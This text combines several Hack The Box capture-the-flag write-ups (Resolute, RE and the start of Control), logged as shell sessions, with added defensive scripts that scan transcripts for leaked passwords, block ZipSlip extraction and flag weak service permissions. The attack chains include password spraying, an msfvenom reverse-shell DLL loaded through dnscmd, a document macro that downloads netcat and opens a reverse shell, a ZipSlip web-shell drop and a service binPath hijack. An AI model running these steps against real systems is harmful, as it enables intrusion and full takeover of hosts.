Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED

enum4linux complete on Fri Jul 10 03:25:47 2020
kali@kali:~/htb$
I now have the list of users, their group memberships and a clear-text password for one user.
GETTING USER
Let us query the SMB service with rpcclient. Before that, let us gather some more information about the user Marko, whose password we have in clear text from the enum4linux scan.
kali@kali:~/htb/resolute$ rpcclient -U "" -N 10.10.10.169
Unable to initialize messaging context
rpcclient $> queryuser marko
	User Name   :	marko
	Full Name   :	Marko Novak
	Home Drive  :
	Dir Drive   :
	Profile Path:
	Logon Script:
	Description :	Account created. Password set to Welcome123!
	Workstations:
	Comment     :
	Remote Dial :
	Logon Time               :	Wed, 31 Dec 1969 19:00:00 EST
	Logoff Time              :	Wed, 31 Dec 1969 19:00:00 EST
	Kickoff Time             :	Wed, 13 Sep 30828 22:48:05 EDT
	Password last set Time   :	Fri, 27 Sep 2019 09:17:15 EDT
	Password can change Time :	Sat, 28 Sep 2019 09:17:15 EDT
	Password must change Time:	Wed, 13 Sep 30828 22:48:05 EDT
	unknown_2[0..31]...
	user_rid :	0x457
	group_rid:	0x201
	acb_info :	0x00000210
	fields_present:	0x00ffffff
	logon_divs:	168
	bad_password_count:	0x00000000
	logon_count:	0x00000000
	padding1[0..7]...
	logon_hrs[0..21]...
rpcclient $>
I tried to run Evil-WinRM with Marko's credentials, but it didn't work. So I guessed that Marko doesn't have access to the system or his account is locked out. I decided to try the same password for the rest of the users; the password Welcome123! worked for Melanie.
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p Welcome123!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> cd ..
*Evil-WinRM* PS C:\Users\melanie> cd Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> dir

    Directory: C:\Users\melanie\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        12/3/2019   7:33 AM             32 user.txt

*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
0c3[redacted]540
*Evil-WinRM* PS C:\Users\melanie\Desktop>
Then look for hidden directories:
*Evil-WinRM* PS C:\> dir -force
I noticed the directory "PSTranscripts" and went on to find what is inside. The directory has a folder "20191203" inside, and in there is a text file called "PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt". The text file is a PowerShell transcript. I used type to read it; here is the full transcript.
*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ') if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
*Evil-WinRM* PS C:\PSTranscripts\20191203>
I found a lot of useful information, including the user ryan (probably a system administrator), a link to the backups share, system file locations, and so on.
Next, use Evil-WinRM again to log in as ryan.
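The transcript above leaked a password because a command line was logged verbatim. As an added example (not part of the original write-up), the scanner below reads a PSTranscripts file and flags commands that carry a clear-text password; the transcript text, the rule names and the function names are constructed for this demo and modelled on the file format shown above.

```python
import re
from typing import Dict, List

# Constructed sample in the layout of the PowerShell_transcript.*.txt file
# shown above (not the box's real file): a header block, then the commands
# that Invoke-Expression bound, one of which passes a password to net use.
SAMPLE_TRANSCRIPT = """\
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\\ryan
RunAs User: MEGABANK\\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\\\fs01\\backups ryan Serv3r4Admin4cc123! if (!$?) { exit 1 }"
>> CommandInvocation(Out-String): "Out-String"
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="Get-ChildItem C:\\Users"
"""

# The transcript header names the account whose session was recorded.
USERNAME_RE = re.compile(r"^Username:\s*(?P<user>\S+)", re.MULTILINE)
# Every command the remoting host ran is bound to Invoke-Expression's
# -Command parameter and logged in full.
BINDING_RE = re.compile(
    r'ParameterBinding\(Invoke-Expression\): name="Command"; value="(?P<cmd>.*)"\s*$',
    re.MULTILINE,
)

# Detection rules (constructed): name plus a regex applied to one command.
RULES = [
    # net use with a positional argument after the UNC path: that position
    # is the password, so it sits in clear text in the transcript.
    ("net-use-plaintext",
     re.compile(r"\bnet\s+use\b\s+(?:[A-Za-z]:\s+)?\\\\\S+\s+(?!/)\S+", re.IGNORECASE)),
    # Credential objects built from a literal string in PowerShell.
    ("securestring-plaintext",
     re.compile(r"ConvertTo-SecureString\b.*-AsPlainText", re.IGNORECASE)),
    # Password switches of common admin tools.
    ("password-switch",
     re.compile(r"(?:/password:|--password[= ]|-Password\s+)\S+", re.IGNORECASE)),
]


def extract_commands(transcript: str) -> List[str]:
    """Return every command string that Invoke-Expression bound."""
    return [m.group("cmd") for m in BINDING_RE.finditer(transcript)]


def scan_transcript(transcript: str) -> List[Dict[str, str]]:
    """Return one finding per command that matches a credential rule.

    Findings contain the command verbatim, so the report itself is
    sensitive and must be stored with the same care as the transcript.
    """
    user_match = USERNAME_RE.search(transcript)
    user = user_match.group("user") if user_match else "<unknown>"
    findings = []
    for cmd in extract_commands(transcript):
        for rule, pattern in RULES:
            if pattern.search(cmd):
                findings.append({"user": user, "rule": rule, "command": cmd})
                break  # one finding per command is enough
    return findings


if __name__ == "__main__":
    for hit in scan_transcript(SAMPLE_TRANSCRIPT):
        print(f"{hit['user']}: [{hit['rule']}] {hit['command']}")
```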
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123! Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\ryan\Documents> dir -force Directory: C:\Users\ryan\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- d--hsl 9/27/2019 7:05 AM My Music d--hsl 9/27/2019 7:05 AM My Pictures d--hsl 9/27/2019 7:05 AM My Videos *Evil-WinRM* PS C:\Users\ryan\Documents>
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami megabank\ryan *Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============================================== =============================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Mandatory Level Label S-1-16-8192 *Evil-WinRM* PS C:\Users\ryan\Documents>
The user ryan is found to be a member of DnsAdmins. Being a member of the DnsAdmins group allows us to use dnscmd.exe to specify a plugin DLL that should be loaded by the DNS service.
kali@kali:~/htb/resolute$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=4444 --platform=windows -f dll > plugin.dll [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 460 bytes Final size of dll file: 5120 bytes
or we use:
msfvenom -p windows/x64/exec cmd='net user administrator P@s5w0rd123! /domain' -f dll > da.dll
Transferring this to the box would likely trigger Windows Defender, so we can use Impacket's smbserver.py to start an SMB server and host the DLL remotely.
kali@kali:~/htb/resolute$ sudo python3 smbserver.py share ./ Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.10.169,50628) [*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE) [*] User RESOLUTE\RESOLUTE$ authenticated successfully [*] RESOLUTE$::MEGABANK:4141414141414141:283a502fc11be6ad1ec4fa0aa4cabfba:010100000000000080db3d319d56d601c17a65539582e7de0000000001001000750078006f0050004f0058005300650003001000750078006f0050004f00580053006500020010006200620042005700410073006300430004001000620062004200570041007300630043000700080080db3d319d56d601060004000200000008003000300000000000000000000000004000001d931475038242cfeeee05844da428985f415e4fa4005bcd9cf845e6c9bda5510a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310033000000000000000000 [*] Disconnecting Share(1:IPC$) [*] Disconnecting Share(2:SHARE) [*] Handle: 'ConnectionResetError' object is not subscriptable [*] Closing down connection (10.10.10.169,50628) [*] Remaining connections []
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd resolute /config /serverlevelplugindll \\10.10.14.13\share\plugin.dll
*Evil-WinRM* PS C:\Users\ryan\Documents> sc stop dns
*Evil-WinRM* PS C:\Users\ryan\Documents> sc start dns
kali@kali:~/htb/resolute$ nc -nlvp 4444 listening on [any] 4444 ... connect to [10.10.14.13] from (UNKNOWN) [10.10.10.169] 50629 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\system32>hostname hostname Resolute C:\Windows\system32>whoami whoami nt authority\system
Author: Puckiestyle
htb-re-nl
As always, first an nmap scan
root@kali:~/htb/re# nmap -p- -sT -oN nmapscan 10.10.10.144 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-20 03:27 EST Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 14.92% done; ETC: 03:30 (0:02:23 remaining) Nmap scan report for 10.10.10.144 Host is up (0.029s latency). Not shown: 65533 filtered ports PORT STATE SERVICE 80/tcp open http 445/tcp open microsoft-ds
I found the shares using
root@kali:~/htb/re# smbmap -H 10.10.10.144 -u guest -p '' [+] Finding open SMB ports.... [+] User SMB session establishd on 10.10.10.144... [+] IP: 10.10.10.144:445 Name: reblog.htb Disk Permissions ---- ----------- IPC$ READ ONLY malware_dropbox READ ONLY
Next I read reblog.htb, and then uploaded a malicious odt file; later it turned out that it had to be an ods file.
In Metasploit there is an exploit that should work:
exploit/multi/misc/openoffice_document_macro
We rename the resulting file to .zip, and edit it by replacing the payload with:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd"> <script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic"> Sub OnLoad Shell("certutil.exe -urlcache -split -f 'http://10.10.14.7/nc.exe' C:\Windows\System32\spool\drivers\color\nc.exe") Shell("C:\Windows\System32\spool\drivers\color\nc.exe 10.10.14.7 1111 -e cmd.exe") End Sub </script:module>
root@kali:~/htb/re# smbclient //reblog.htb/"malware_dropbox" -u blah Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Jan 22 02:19:02 2020 .. D 0 Wed Jan 22 02:19:02 2020 8247551 blocks of size 4096. 4294559 blocks available smb: \> put puckiestyle.odt putting file puckiestyle.odt as \puckiestyle.odt (28.8 kb/s) (average 28.8 kb/s) smb: \>
root@kali:~/htb# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.144 - - [22/Jan/2020 04:03:03] "GET /nc.exe HTTP/1.1" 200 - 10.10.10.144 - - [22/Jan/2020 04:03:04] "GET /nc.exe HTTP/1.1" 200 - 10.10.10.144 - - [22/Jan/2020 04:03:53] "GET /nc.exe HTTP/1.1" 200 - 10.10.10.144 - - [22/Jan/2020 04:03:53] "GET /nc.exe HTTP/1.1" 200 - root@kali:~/htb/re# smbclient //reblog.htb/"malware_dropbox" -u blah Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Jan 22 04:59:00 2020 .. D 0 Wed Jan 22 04:59:00 2020 8247551 blocks of size 4096. 4294527 blocks available smb: \> put facelesscoder.ods putting file facelesscoder.ods as \facelesscoder.ods (28.0 kb/s) (average 28.0 kb/s) smb: \> put facelesscoder.ods putting file facelesscoder.ods as \facelesscoder.ods (28.1 kb/s) (average 28.1 kb/s) smb: \>
Here is the odt/ods file I used: https://github.com/puckiestyle/pentest/blob/master/puckiestyle.ods.zip
root@kali:~# rlwrap nc -nlvp 1111 listening on [any] 1111 ... connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49675 Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved. C:\Program Files\LibreOffice\program>whoami whoami re\luke C:\Program Files\LibreOffice\program> c:\Users\luke\Desktop>type user.txt type user.txt FE41736F5B9311E48E48B520D9F384D3
Creating a ZipSlip archive
I create a ZipSlip by first creating the folders \inetpub\wwwroot\blog on my Kali box.
Then I copied puckieshell.ods there.
Then I created the ZipSlip with
root@kali:/HTB/RE# zip temp.zip ../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx adding ../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx ( deflated 75%)
Then upload this zipslip.zip to the ods folder for analysis by the vulnerable WinRAR.
c:\Users\luke\Documents>dir dir Volume in drive C has no label. Volume Serial Number is 4638-2C29 Directory of c:\Users\luke\Documents 06/18/2019 01:05 PM <DIR> . 06/18/2019 01:05 PM <DIR> .. 01/22/2020 03:28 AM <DIR> malware_dropbox 01/22/2020 03:28 AM <DIR> malware_process 01/22/2020 03:46 AM <DIR> ods 06/18/2019 09:30 PM 1,096 ods.yara 06/18/2019 09:33 PM 1,783 process_samples.ps1 03/13/2019 05:47 PM 1,485,312 yara64.exe 3 File(s) 1,488,191 bytes 5 Dir(s) 17,559,576,576 bytes free c:\Users\luke\Documents>whoami whoami re\luke c:\Users\luke\Documents>certutil -urlcache -split -f "http://10.10.14.7/puckiestyle.zip" "c:\Users\luke\Documents\ods\runme.rar" certutil -urlcache -split -f "http://10.10.14.7/puckiestyle.zip" "c:\Users\luke\Documents\ods\runme.rar" **** Online **** 0000 ... 322f CertUtil: -URLCache command completed successfully.
root@kali:~/htb# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.144 - - [22/Jan/2020 08:16:30] "GET /nc.exe HTTP/1.1" 200 - 10.10.10.144 - - [23/Jan/2020 04:00:25] "GET /puckiestyle.zip HTTP/1.1" 200 -
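The archive above works because the extractor writes an entry whose name climbs out of the target folder with `../`. As an added example (not part of the original write-up), this is the check an extractor needs: every member name is resolved against the destination and rejected if it lands outside. The archive is constructed in memory for the demo; the function names are my own.

```python
import io
import os
import re
import tempfile
import zipfile
from typing import List, Tuple


def is_safe_member(name: str, dest: str) -> bool:
    """True if extracting `name` under `dest` cannot escape `dest`."""
    # Windows archivers honour backslashes as separators, so normalise them.
    norm = name.replace("\\", "/")
    # Absolute paths and drive-letter paths are never acceptable members.
    if norm.startswith("/") or re.match(r"^[A-Za-z]:", norm):
        return False
    dest_real = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_real, norm))
    return target == dest_real or target.startswith(dest_real + os.sep)


def safe_extract(zip_bytes: bytes, dest: str) -> Tuple[List[str], List[str]]:
    """Extract only members that stay inside dest; return (extracted, rejected)."""
    extracted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not is_safe_member(info.filename, dest):
                rejected.append(info.filename)
                continue
            out = os.path.join(dest, info.filename.replace("\\", "/"))
            if info.is_dir():
                os.makedirs(out, exist_ok=True)
                extracted.append(info.filename)
                continue
            os.makedirs(os.path.dirname(out), exist_ok=True)
            with zf.open(info) as src, open(out, "wb") as dst:
                dst.write(src.read())
            extracted.append(info.filename)
    return extracted, rejected


# Constructed sample archive: one benign entry plus one entry whose name
# climbs out of the extraction folder the way the zip command above does.
TRAVERSAL_NAME = "../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx"


def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.txt", "benign sample entry\n")
        zf.writestr(TRAVERSAL_NAME, "constructed placeholder content, not a web shell\n")
    return buf.getvalue()


def demo() -> Tuple[List[str], List[str]]:
    """Extract the sample into a scratch directory and report what happened."""
    with tempfile.TemporaryDirectory() as dest:
        result = safe_extract(build_sample_zip(), dest)
        # The benign entry is present; the traversal entry was never written.
        assert os.path.exists(os.path.join(dest, "report.txt"))
    return result


if __name__ == "__main__":
    ok, bad = demo()
    print("extracted:", ok)
    print("rejected :", bad)
```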
Then I opened the browser and went to the shell.
I first created a folder c:\temp to put my files in. Then I started a netcat session.
root@kali:~/htb/re# rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49734 Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved. C:\inetpub\wwwroot\blog>whoami whoami iis apppool\reblog
c:\Program Files\Sysinternals>accesschk -accepteula -uvwc * > c:\temp\accesscheck.txt accesschk -accepteula -uvwc * > c:\temp\accesscheck.txt Accesschk v6.12 - Reports effective permissions for securable objects Copyright (C) 2006-2017 Mark Russinovich Sysinternals - www.sysinternals.com
Then I discovered in accesscheck.txt that NT AUTHORITY\SERVICE also had RW access on UsoSvc.
c:\Program Files\Sysinternals>type c:\temp\accesscheck.txt
-snip-
UserManager
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
UsoSvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\SERVICE
        SERVICE_ALL_ACCESS
VaultSvc
For PrivEsc I used the usosvc (first check the current binPath, then change it, and finally stop and start the usosvc service).
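Reading an accesschk dump by eye is how the UsoSvc finding above was made; as an added example (not part of the original write-up), the parser below does that triage automatically, listing every service on which a principal outside the usual administrative set holds a right that lets it rewrite the service configuration. The sample text is constructed in the layout of `accesschk -uvwc *` output; the privileged-principal and dangerous-right sets are my own assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample modelled on the accesschk -uvwc output shown above.
SAMPLE_ACCESSCHK = """\
Accesschk v6.12 - Reports effective permissions for securable objects
Copyright (C) 2006-2017 Mark Russinovich
Sysinternals - www.sysinternals.com

UserManager
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\\Administrators
        SERVICE_ALL_ACCESS
UsoSvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\\SYSTEM
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\\SERVICE
        SERVICE_ALL_ACCESS
VaultSvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\\SYSTEM
        SERVICE_ALL_ACCESS
  R  NT AUTHORITY\\Authenticated Users
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
"""

# An access line: two spaces, the mode (RW/R/W), then the principal.
ACE_RE = re.compile(r"^  (?P<mode>RW|R|W)\s+(?P<principal>\S.*?)\s*$")
# A right line: deeper indentation, one SERVICE_* or generic right.
RIGHT_RE = re.compile(r"^\s{4,}(?P<right>[A-Z_]+)\s*$")

# Assumed sets: principals expected to control services, and rights that
# allow changing binPath or the service's DACL (SERVICE_ALL_ACCESS includes
# SERVICE_CHANGE_CONFIG, which is what the sc config step above used).
PRIVILEGED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
              "NT SERVICE\\TrustedInstaller"}
DANGEROUS = {"SERVICE_ALL_ACCESS", "SERVICE_CHANGE_CONFIG",
             "WRITE_DAC", "WRITE_OWNER", "GENERIC_ALL", "GENERIC_WRITE"}


def parse_accesschk(text: str) -> Dict[str, List[Tuple[str, str]]]:
    """Map service name -> list of (principal, right) pairs."""
    services: Dict[str, List[Tuple[str, str]]] = {}
    current = principal = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):
            # Unindented line: a service name (or a banner line, which
            # collects no rights and is dropped below).
            current, principal = line.strip(), None
            services.setdefault(current, [])
            continue
        ace = ACE_RE.match(line)
        if ace and current:
            principal = ace.group("principal")
            continue
        right = RIGHT_RE.match(line)
        if right and current and principal:
            services[current].append((principal, right.group("right")))
    return {svc: aces for svc, aces in services.items() if aces}


def find_weak_services(parsed: Dict[str, List[Tuple[str, str]]]) -> Dict[str, List[Tuple[str, str]]]:
    """Services where a non-privileged principal holds a dangerous right."""
    weak: Dict[str, List[Tuple[str, str]]] = {}
    for svc, aces in parsed.items():
        hits = [(p, r) for p, r in aces if p not in PRIVILEGED and r in DANGEROUS]
        if hits:
            weak[svc] = hits
    return weak


if __name__ == "__main__":
    for svc, hits in find_weak_services(parse_accesschk(SAMPLE_ACCESSCHK)).items():
        for principal, right in hits:
            print(f"{svc}: {principal} has {right}")
```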
C:\inetpub\wwwroot\blog>sc config usosvc binPath="C:\temp\nc.exe 10.10.14.7 53 -e cmd"
sc config usosvc binPath="C:\temp\nc.exe 10.10.14.7 53 -e cmd"
[SC] ChangeServiceConfig SUCCESS
C:\inetpub\wwwroot\blog>reg query "HKLM\System\CurrentControlSet\Services\usosvc" /v "ImagePath"
reg query "HKLM\System\CurrentControlSet\Services\usosvc" /v "ImagePath"
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\usosvc
ImagePath REG_EXPAND_SZ C:\temp\nc.exe 10.10.14.7 53 -e cmd
C:\inetpub\wwwroot\blog>net stop usosvc
net stop usosvc
The Update Orchestrator Service service is not started.
More help is available by typing NET HELPMSG 3521.
C:\inetpub\wwwroot\blog>net start usosvc
net start usosvc
The service is not responding to the control function.
More help is available by typing NET HELPMSG 2186.
C:\inetpub\wwwroot\blog>
root@kali:~/htb/re# rlwrap nc -nlvp 53
listening on [any] 53 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49735
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>net user coby IEstyle
net user coby IEstyle
The command completed successfully.
C:\Windows\system32>net share root=C:\Users\administrator\desktop /grant:everyone,FULL
C:\Windows\system32>net use z: \\127.0.0.1\root /user:coby IEstyle
net use z: \\127.0.0.1\root /user:coby IEstyle
The command completed successfully.
C:\Windows\system32>z:
z:
Z:\>dir
dir
Volume in drive Z has no label.
Volume Serial Number is 4638-2C29
Directory of Z:\
04/14/2019 11:35 AM <DIR> .
04/14/2019 11:35 AM <DIR> ..
03/27/2019 05:37 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 17,572,204,544 bytes free
Z:\>type root.txt
type root.txt
1B4FB905423F4AD8D99C731468F7715D
Z:\>
Invoke-ServiceAbuse -Name "UsoSvc" -Command "\users\public\downloads\nc.exe 10.10.14.7 53 -e cmd"
Author: Puckiestyle
htb-control-nl
As always we start with an nmap scan
# Nmap 7.80 scan initiated Fri Jan 3 10:25:07 2020 as: nmap -sC -sV -oA control-nmap 10.10.10.167 Nmap scan report for 10.10.10.167 Host is up (0.033s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Fidelity 135/tcp open msrpc Microsoft Windows RPC 3306/tcp open mysql? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, HTTPOptions, Help, Kerberos, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: |_ Host '10.10.16.70' is not allowed to connect to this MariaDB server 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port3306-TCP:V=7.80%I=7%D=1/3%Time=5E0F5CE5%P=x86_64-pc-linux-gnu%r(HTT SF:POptions,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x2 SF:ookie,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x2\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x20allowed\x20to\x20conne SF:ct\x20to\x20this\x20MariaDB\x20server"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Jan 3 10:25:32 2020 -- 1 IP address (1 host up) scanned in 25.52 seconds
There is a website called "Fidelity" hosted on the default TCP port.

There are 4 pages: an index page, an about page, an admin page and a login page. The admin and login pages did not show a login form, only the error "Access Denied: Header Missing. Please ensure you go through the proxy to access this page". This error points towards a misconfiguration, so I proceed to analyze the source code.


The source code of index.php has a commented section with a to-do message:
<!-- To Do: -->
Import Products
Link to new payment system
Enable SSL (Certificates location \192.168.4.28\myfiles)
<!-- Header -->
This revealed an internal IP address: 192.168.4.28. I fire up Burp to see whether any requests are being sent or received.

The Burp capture also showed that the request isn't going to the web server through a proxy, and the same error comes back when I request the admin.php or login.php pages.
So, to access these pages you either need a proxy that is allowed access, or you simulate that you are using the proxy by adding the HTTP header "X-Forwarded-For". Burp makes it easy to add such headers, so I use my already running Burp. I assumed that 192.168.4.28 is the proxy IP for X-Forwarded-For because it is the only internal IP I found in the website's source code, and it actually worked.
